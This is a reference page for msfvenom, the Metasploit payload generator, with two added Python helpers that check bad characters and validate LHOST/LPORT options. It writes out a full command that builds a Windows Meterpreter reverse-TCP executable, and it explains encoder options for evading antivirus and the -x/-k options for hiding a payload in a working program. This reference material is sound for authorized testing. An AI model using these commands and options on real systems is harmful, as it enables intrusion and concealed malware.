msfvenom
Generate Metasploit payloads
TLDR
List payloads
List formats
Show payload options
Create an ELF binary with a reverse TCP handler
Create an EXE binary with a reverse TCP handler
Create a raw Bash with a reverse TCP handler
SYNOPSIS
msfvenom -p <payload> [options] -f <format> -o <output_file>
msfvenom [options]
PARAMETERS
-p, --payload <payload>
Specify the payload to use. This is often the first and most critical option to define the malicious behavior.
-l, --list <type>
List available modules of a specific type. Common types include payloads, encoders, nops, or all to list everything.
-f, --format <format>
Specify the output format for the generated payload. Examples include exe (Windows executable), elf (Linux executable), raw (raw shellcode), sh (shell script), asp, war, apk, etc.
-e, --encoder <encoder>
Specify the encoder to use to obfuscate the payload. Encoders help in evading basic antivirus detection. Examples include x86/shikata_ga_nai.
-a, --arch <architecture>
Specify the target architecture for the payload (e.g., x86, x64, armle, mips). This must match the target system's architecture.
-o, --output <file>
Save the generated payload to the specified output file.
-b, --bad-chars <chars>
Specify characters to avoid in the generated payload, often used to prevent breaking exploit stability due to specific character limitations (e.g., '\x00\x0a\x0d' for null, newline, carriage return).
-i, --iterations <count>
The number of times to encode the payload. Multiple iterations can further obfuscate the payload, but also increase its size and potentially reduce stability.
-x, --template <path>
Specify a custom executable template to embed the payload into. This allows embedding the malicious payload within a legitimate-looking application.
-k, --keep
When used with --template, this option preserves the template's original functionality, making the resulting executable appear normal while secretly executing the payload.
-s, --space <size>
The maximum size of the generated payload in bytes. Useful for fitting payloads into limited buffer spaces during exploitation.
-n, --nopsled <count>
Prepend a NOP sled of <count> bytes to the payload. NOP sleds increase the chances of landing execution inside the payload during exploitation by providing a run of 'no operation' instructions before it.
-v, --var-name <name>
Specify a custom variable name for certain output formats (e.g., C, Perl, Ruby shellcode arrays) where the payload is stored as a variable.
--platform <platform>
Specify the target platform for the payload (e.g., windows, linux, osx, android). This helps in filtering relevant payloads and encoders.
--smallest
Generate the smallest possible payload. This often implies using a non-staged payload and minimal encoding to reduce byte count.
--raw
Output raw payload bytes, useful when the payload needs to be integrated into custom exploit code or buffer overflows.
--help
Display the help message and exit.
--version
Show the msfvenom version information and exit.
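The -b, -s and -n options each place a constraint on the bytes msfvenom emits, and a practitioner normally verifies those constraints on the generated buffer before using it. The following script is an added example, not part of the msfvenom project: it parses the \xHH escapes from msfvenom's C-style output (the shape produced by -f c with -v), then reports the payload size, any forbidden bytes with their offsets, and the length of the leading x86 NOP sled. The C array below is constructed by hand for the demonstration and deliberately contains bytes that violate the bad-character list; it is not shellcode.

```python
"""Verify -b/-s/-n constraints against msfvenom's C-style output.

Added example; not part of the msfvenom project.  The sample array is
constructed by hand so the script runs offline and is not real shellcode.
"""
import re
from typing import Dict

# One \xHH escape, as emitted in the C, Python and Ruby output formats.
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")

# Constructed sample in the shape of `msfvenom ... -f c -v buf` output.
# It intentionally contains 0x00, 0x0a and 0x0d so the check has something
# to find.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x00\x0a"
"\x41\x42\x43\x0d\x44";
'''


def parse_escaped_bytes(text: str) -> bytes:
    """Collect every \\xHH escape in the text, in order, into a byte string."""
    return bytes(int(h, 16) for h in ESCAPE_RE.findall(text))


def find_bad_chars(payload: bytes, bad_spec: str) -> Dict[int, int]:
    """Map each offset holding a byte from the -b list to that byte value.

    bad_spec uses the same syntax as msfvenom's -b option, e.g. '\\x00\\x0a\\x0d'.
    """
    forbidden = set(parse_escaped_bytes(bad_spec))
    return {i: b for i, b in enumerate(payload) if b in forbidden}


def leading_nop_count(payload: bytes, nop: int = 0x90) -> int:
    """Length of the run of NOP bytes (0x90 on x86) at the start of the payload."""
    count = 0
    for b in payload:
        if b != nop:
            break
        count += 1
    return count


def verify(text: str, bad_spec: str, max_size: int) -> dict:
    """Check one generated buffer against the -b and -s constraints.

    Returns a report dict; 'ok' is True only when the buffer fits in max_size
    and contains none of the forbidden bytes.
    """
    payload = parse_escaped_bytes(text)
    bad_hits = find_bad_chars(payload, bad_spec)
    fits = len(payload) <= max_size
    return {
        "size": len(payload),
        "fits": fits,
        "bad_offsets": bad_hits,
        "leading_nops": leading_nop_count(payload),
        "ok": fits and not bad_hits,
    }


if __name__ == "__main__":
    report = verify(SAMPLE_C_OUTPUT, r"\x00\x0a\x0d", max_size=20)
    print(f"size={report['size']} fits={report['fits']} "
          f"leading_nops={report['leading_nops']} ok={report['ok']}")
    for offset, value in sorted(report["bad_offsets"].items()):
        print(f"  forbidden byte 0x{value:02x} at offset {offset}")
```

Running the script on the constructed sample reports an 18-byte buffer that fits in 20 bytes but fails the check because three forbidden bytes remain; on a buffer msfvenom produced with a matching -b list the bad_offsets map should be empty. The same parser works on the -f python and -f ruby outputs, since all three formats spell bytes as \xHH escapes.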
DESCRIPTION
msfvenom is a powerful command-line utility that is an integral part of the Metasploit Framework, widely used by penetration testers and security researchers. It serves as a standalone payload generator and encoder, consolidating the functionalities of msfpayload and msfencode into a single, more efficient tool.
Its primary purpose is to create various types of malicious payloads, ranging from simple shellcode to complex executables, web scripts, and mobile application payloads, targeting a multitude of operating systems and architectures (e.g., Windows, Linux, macOS, Android, iOS, x86, x64, ARM). msfvenom allows users to specify the payload, encoder, number of iterations, and output format. The encoding capabilities are crucial for evading signature-based antivirus detection, though advanced AV/EDR solutions can often detect msfvenom-generated payloads. It's an essential tool for crafting custom implants during red team operations and vulnerability exploitation.
CAVEATS
Generated payloads from msfvenom, especially with common encoders, are frequently detected by modern antivirus (AV) and Endpoint Detection and Response (EDR) solutions. Advanced obfuscation techniques or custom shellcode may be required for evasion.
Usage of msfvenom requires a deep understanding of security principles and should only be performed with explicit legal authorization and ethical considerations. Misuse can lead to severe legal consequences.
PAYLOAD OPTIONS (LHOST, LPORT, ETC.)
Many payloads generated by msfvenom require specific configuration options to function correctly. These options are typically appended directly after the payload name using the KEY=VALUE format.
Common options include:
LHOST: The local host or attacker's IP address where the listener will be set up.
LPORT: The local port on which the listener will operate.
RHOST: The remote host or target's IP address (for bind payloads or exploits).
RPORT: The remote port on the target (for bind payloads or specific exploits).
For example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe
These options are crucial for defining the payload's behavior, especially for reverse shell connections or stage configurations.
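The KEY=VALUE options described above are positional tokens placed after the payload name, and msfvenom itself reports a misconfigured LHOST or LPORT only at generation time. The following helper is an added example, not code from the msfvenom project: it splits such tokens from a command line, keeps the first '=' as the separator so values containing '=' survive, and validates the LHOST/RHOST and LPORT/RPORT values before they are handed on. The sample command line is constructed and uses a private-range address.

```python
"""Parse and validate msfvenom-style KEY=VALUE payload options.

Added example; not part of the msfvenom project.
"""
import ipaddress
import re
from typing import Dict, List

# Option names whose values must be a host (IP address or hostname).
HOST_KEYS = {"LHOST", "RHOST"}
# Option names whose values must be a TCP/UDP port number.
PORT_KEYS = {"LPORT", "RPORT"}
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)([A-Za-z0-9-]{1,63}\.)*[A-Za-z0-9-]{1,63}$")


def parse_payload_options(argv: List[str]) -> Dict[str, str]:
    """Return the KEY=VALUE tokens in argv as a dict (keys upper-cased).

    Tokens beginning with '-' are msfvenom flags and are skipped; only the
    first '=' splits a token, so a value such as 'a=b' is kept intact.
    """
    options: Dict[str, str] = {}
    for token in argv:
        if token.startswith("-") or "=" not in token:
            continue
        key, value = token.split("=", 1)
        if not key:
            raise ValueError(f"empty option name in token {token!r}")
        options[key.upper()] = value
    return options


def validate_payload_options(options: Dict[str, str]) -> List[str]:
    """Return a list of problems found; an empty list means the options are sane."""
    problems: List[str] = []
    for key, value in options.items():
        if key in HOST_KEYS:
            try:
                ipaddress.ip_address(value)
            except ValueError:
                if not HOSTNAME_RE.match(value):
                    problems.append(f"{key}={value!r} is neither an IP address nor a hostname")
        elif key in PORT_KEYS:
            if not value.isdigit() or not 1 <= int(value) <= 65535:
                problems.append(f"{key}={value!r} is not a port in 1-65535")
    return problems


if __name__ == "__main__":
    # Constructed command line; the address is a private-range placeholder.
    sample_argv = ["-p", "windows/meterpreter/reverse_tcp",
                   "LHOST=192.168.1.100", "LPORT=4444", "-f", "exe", "-o", "payload.exe"]
    opts = parse_payload_options(sample_argv)
    print(opts)
    print("problems:", validate_payload_options(opts) or "none")
```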
HISTORY
msfvenom was introduced as a significant improvement within the Metasploit Framework, debuting around 2015 with Metasploit Framework version 4.10. Its creation was driven by the need to consolidate and streamline the payload generation process. Prior to msfvenom, users had to employ two separate command-line tools: msfpayload to generate the raw payload and then msfencode to obfuscate and format it. This often involved piping the output of one command to the input of another, which could be cumbersome and prone to errors.
msfvenom effectively merged the functionalities of both msfpayload and msfencode into a single, more efficient, and user-friendly command. This integration simplified the workflow for penetration testers, reduced overhead, and provided a more robust and unified interface for crafting custom payloads, quickly making it an indispensable tool in the security community.
SEE ALSO
msfconsole(1), meterpreter(1), nmap(1), netcat(1)